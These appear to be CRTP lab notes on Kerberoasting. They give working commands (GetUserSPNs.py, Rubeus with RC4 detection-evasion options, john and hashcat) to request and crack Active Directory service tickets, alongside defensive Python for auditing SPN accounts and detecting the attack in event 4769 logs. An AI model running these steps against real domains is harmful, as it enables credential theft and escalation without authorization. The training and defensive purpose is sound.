# 7.4 - Kerberoasting

## Kerberoasting

Kerberoasting targets **service accounts with an assigned SPN**. When a user requests access to a service, they receive a **Service Ticket (ST)** encrypted with a key derived from the service account's long-term password.

If an attacker can obtain the **ST**, they can attempt to crack it offline to recover the service account password; cracking needs no further contact with the service or the KDC, so no lockouts or authentication failures are generated.

#### Kerberos Ticket Exchange for Services

```
3) TGS-REQ (Client -> KDC/TGS)
   - TGT 🔑 Encrypted with KDC key
   - Authenticator Data 🔑 Encrypted with TGS Session Key

4) TGS-REP (KDC/TGS -> Client)
   - ST 🔑 Encrypted with Service key
   - Service Session Key 🔑 Encrypted with TGS Session Key
```

Unlike AS-REP Roasting, Kerberoasting requires valid domain user credentials to request a service ticket.

### Example: Exploiting Kerberoasting

**Step 1: Create a User with an SPN**

```powershell
New-ADUser -Name "kerberoasting" -SamAccountName "kerberoasting" -UserPrincipalName "kerberoasting@dev-angelist" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $true
```

**Step 2: Assign an SPN**

```powershell
Set-ADUser -Identity "kerberoasting" -ServicePrincipalNames @{Add="HTTP/kerberoasting.dev-angelist.lab"}
```

**Step 3: Verify the SPN**

```powershell
Get-ADUser -Identity "kerberoasting" -Properties ServicePrincipalNames
setspn -L kerberoasting
```

![](https://3295003978-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F0VoFkXlcamRW1EV8XKU7%2Fuploads%2FRVtIiJUjIrrGl3Kq6pA5%2Fimage.png?alt=media&token=25547ba8-70f3-477b-b7bb-90ea9ae31e18)

**Step 4: Identify Kerberoastable Accounts**

```bash
# On the attacker machine, create a dedicated Python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
# List Kerberoastable users with Impacket's GetUserSPNs.py
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc
```

Or, from a Windows host, with the AD module or PowerView:

```powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-DomainUser -SPN
```

![](https://3295003978-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F0VoFkXlcamRW1EV8XKU7%2Fuploads%2Fi7vRDgpIvzeFxwGMZcEo%2Fimage.png?alt=media&token=edf9c2e8-e533-45d6-b1ce-11fe31f1970d)

In this case there are two Kerberoastable users: `kerberoasting` and `angel`.
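A defender-side counterpart to this enumeration, as an added example (not code from these notes): given an export of the SPN-bearing accounts that Step 4 lists, score which of them are actually exposed to offline cracking. The export below is constructed and its field names mirror Get-ADUser attributes; the password-age threshold, the scoring and the function name are assumptions.

```python
"""Audit SPN-bearing user accounts for Kerberoasting exposure.
Added example, not the notes' own code. Input is a constructed export in the
shape of Get-ADUser output; thresholds and scoring are assumptions."""
from datetime import datetime, timedelta

# Bit flags of msDS-SupportedEncryptionTypes (MS-KILE)
RC4_HMAC = 0x4
AES128_CTS = 0x8
AES256_CTS = 0x10

MAX_PASSWORD_AGE = timedelta(days=365)   # assumed policy threshold
NOW = datetime(2024, 5, 1)               # fixed reference date for the sample

# Constructed sample mirroring the lab: two SPN-bearing users, one hardened
# service account, a plain user without SPN and a computer account.
ACCOUNTS = [
    {"SamAccountName": "kerberoasting",
     "ServicePrincipalNames": ["HTTP/kerberoasting.dev-angelist.lab"],
     "msDS-SupportedEncryptionTypes": None,           # attribute not set
     "PasswordLastSet": datetime(2024, 4, 29), "AdminCount": 0},
    {"SamAccountName": "angel",
     "ServicePrincipalNames": ["MSSQLSvc/sql01.dev-angelist.lab:1433"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC,       # RC4 only
     "PasswordLastSet": datetime(2022, 1, 15), "AdminCount": 1},
    {"SamAccountName": "svc_web",
     "ServicePrincipalNames": ["HTTP/web01.dev-angelist.lab"],
     "msDS-SupportedEncryptionTypes": AES128_CTS | AES256_CTS,  # 0x18, AES only
     "PasswordLastSet": datetime(2024, 4, 1), "AdminCount": 0},
    {"SamAccountName": "devan", "ServicePrincipalNames": [],
     "msDS-SupportedEncryptionTypes": None,
     "PasswordLastSet": datetime(2024, 4, 20), "AdminCount": 0},
    {"SamAccountName": "DC01$", "ServicePrincipalNames": ["HOST/dc01.dev-angelist.lab"],
     "msDS-SupportedEncryptionTypes": 0x1c,
     "PasswordLastSet": datetime(2024, 4, 10), "AdminCount": 0},
]


def audit_spn_accounts(accounts, now):
    """Return one finding per Kerberoastable user account, highest risk first."""
    findings = []
    for acct in accounts:
        name = acct["SamAccountName"]
        # Only SPN-bearing accounts receive service tickets; computer accounts ($)
        # have long random passwords and are not a realistic cracking target.
        if not acct.get("ServicePrincipalNames") or name.endswith("$"):
            continue
        reasons = []
        etypes = acct.get("msDS-SupportedEncryptionTypes") or 0
        if etypes == 0:
            reasons.append("encryption types unset: domain default applies, "
                           "RC4 service tickets may be issued")
        else:
            if etypes & RC4_HMAC:
                reasons.append("RC4-HMAC permitted (fast to crack)")
            if not etypes & (AES128_CTS | AES256_CTS):
                reasons.append("no AES encryption type enabled")
        age = now - acct["PasswordLastSet"]
        if age > MAX_PASSWORD_AGE:
            reasons.append(f"password last set {age.days} days ago")
        if acct.get("AdminCount"):
            reasons.append("adminCount=1: a cracked password yields a privileged account")
        findings.append({"account": name, "score": len(reasons), "reasons": reasons})
    return sorted(findings, key=lambda f: (-f["score"], f["account"]))


if __name__ == "__main__":
    for f in audit_spn_accounts(ACCOUNTS, NOW):
        print(f["score"], f["account"], "; ".join(f["reasons"]))
```

Each reason maps to a mitigation: restrict the service account to AES (`msDS-SupportedEncryptionTypes` = 0x18), rotate long-lived service passwords or move the SPN to a group Managed Service Account whose long random password rotates automatically, and keep SPN-bearing accounts out of privileged groups so a cracked ticket does not hand over domain admin.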

**Step 5: Request Service Tickets for Kerberoasting**

```bash
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request   # without specifying a user, tickets are requested for every SPN account
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request-user kerberoasting | grep '\$krb5tgs\$' > kerberoast.txt
```

or using Rubeus:

```powershell
# View statistics on Kerberoastable accounts:
Rubeus.exe kerberoast /stats
# Request a TGS for a specific user:
Rubeus.exe kerberoast /user:svcadmin /simple
# To avoid detection (e.g., MDI logging of encryption downgrade attacks), target accounts restricted to RC4:
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
# Kerberoast all RC4-only accounts and output to file:
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
```

![](https://3295003978-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F0VoFkXlcamRW1EV8XKU7%2Fuploads%2FeMUa5AtCm4Dr9ExiWSlN%2Fimage.png?alt=media&token=eea1bca3-9ce7-4329-b728-97a3c8b588a6)

![](https://3295003978-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F0VoFkXlcamRW1EV8XKU7%2Fuploads%2FxSR36nJc4YWGSpQAha23%2Fimage.png?alt=media&token=87660f24-fa14-4f75-a5e1-8ad10ed74d9b)
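What the ticket requests in Step 5 look like from the blue-team side, as an added example that is not part of these notes: every TGS-REQ lands in Windows Security event 4769 on the DC, and the two classic indicators are a service ticket for a user account issued with RC4 (`TicketEncryptionType` 0x17) on a domain that otherwise uses AES, and one account requesting tickets for many different service accounts in a short burst. The events below are constructed; the field names follow the 4769 schema, while the window, the threshold and the function names are assumptions.

```python
"""Detect Kerberoasting patterns in Windows Security event 4769 records.
Added example, not code from the original notes. Events are constructed;
field names follow the 4769 schema (TargetUserName, ServiceName,
TicketEncryptionType, Status); window and threshold are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                      # TicketEncryptionType value for RC4-HMAC
WINDOW = timedelta(minutes=5)          # assumed burst window
DISTINCT_SERVICE_THRESHOLD = 3         # assumed: distinct service accounts per window

# Constructed sample: 'devan' requests tickets for three different user-account
# services within one minute, all with RC4; 'alice' makes one normal AES request;
# the WS01$ request is for a computer account and is ignored.
EVENTS = [
    {"EventID": 4769, "Time": datetime(2024, 5, 1, 10, 0, 0), "Status": "0x0",
     "TargetUserName": "devan@DEV-ANGELIST.LAB", "ServiceName": "kerberoasting",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": datetime(2024, 5, 1, 10, 0, 20), "Status": "0x0",
     "TargetUserName": "devan@DEV-ANGELIST.LAB", "ServiceName": "angel",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": datetime(2024, 5, 1, 10, 0, 45), "Status": "0x0",
     "TargetUserName": "devan@DEV-ANGELIST.LAB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": datetime(2024, 5, 1, 10, 1, 0), "Status": "0x0",
     "TargetUserName": "devan@DEV-ANGELIST.LAB", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Time": datetime(2024, 5, 1, 10, 30, 0), "Status": "0x0",
     "TargetUserName": "alice@DEV-ANGELIST.LAB", "ServiceName": "angel",
     "TicketEncryptionType": "0x12"},
]


def is_roastable_service(service_name):
    """In 4769 ServiceName is the service account's sAMAccountName. Computer
    accounts ($) and krbtgt have random keys and are not cracking targets."""
    s = service_name.lower()
    return not s.endswith("$") and s != "krbtgt"


def detect_kerberoasting(events, window=WINDOW, threshold=DISTINCT_SERVICE_THRESHOLD):
    """Return alerts keyed by requesting account; one alert per rule per user."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":   # successful TGS-REQ only
            continue
        if not is_roastable_service(e["ServiceName"]):
            continue
        per_user[e["TargetUserName"]].append(e)

    alerts = []
    for user, evs in per_user.items():
        evs.sort(key=lambda e: e["Time"])
        # Rule 1: RC4 service ticket for a user-account service
        rc4 = sorted({e["ServiceName"] for e in evs if e["TicketEncryptionType"] == RC4_HMAC})
        if rc4:
            alerts.append({"rule": "rc4_service_ticket", "user": user, "services": rc4})
        # Rule 2: many distinct service accounts requested inside one window
        for i, start in enumerate(evs):
            in_window = {e["ServiceName"] for e in evs[i:]
                         if e["Time"] - start["Time"] <= window}
            if len(in_window) >= threshold:
                alerts.append({"rule": "service_ticket_burst", "user": user,
                               "services": sorted(in_window)})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(EVENTS):
        print(alert)
```

Rule 1 is only meaningful when joined with the account inventory: a service account that is itself restricted to RC4 (the case `/rc4opsec` deliberately picks) will always appear with 0x17, so the signal is an RC4 ticket for an account that supports AES. Rule 2 catches the `-request` / `/outfile` sweep regardless of encryption type, which is why the two rules are kept separate.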

**Step 6: Crack the Service Ticket**

```bash
john --wordlist=/home/kali/Documents/password.txt ./kerberoast.txt
hashcat -m 18200 ./kerberoast.txt /home/kali/Documents/password.txt
# Windows equivalent with John:
# john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt
```

![](https://3295003978-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F0VoFkXlcamRW1EV8XKU7%2Fuploads%2FqoFBRjTV9XQjcvglWAhD%2Fimage.png?alt=media&token=60e716a7-1f12-411f-aa93-713bd0789ad3)

#### Troubleshooting: Clock Skew Errors

If a ticket request fails with `KRB_AP_ERR_SKEW (Clock skew too great)`, the attacker host's clock differs from the DC's by more than the tolerated five minutes; synchronize it with:

```bash
sudo timedatectl set-ntp off
ntpdate -q corp-dc
ntpdate -u corp-dc
```

***

## Other Resources

* [Kerberos Authentication Hexdump YT](https://www.youtube.com/watch?v=dQz3CMlVYNY\&list=PLJnLaWkc9xRi71Pso26JlvyBkLUOETLjn)
* [Roasting attacks Hexdump YT](https://www.youtube.com/watch?v=fVTZEIZIEqg)

### Labs

* [Learning Object 15 lab](https://dev-angelist.gitbook.io/crtp-notes/readme/lab/15-lo1-5)
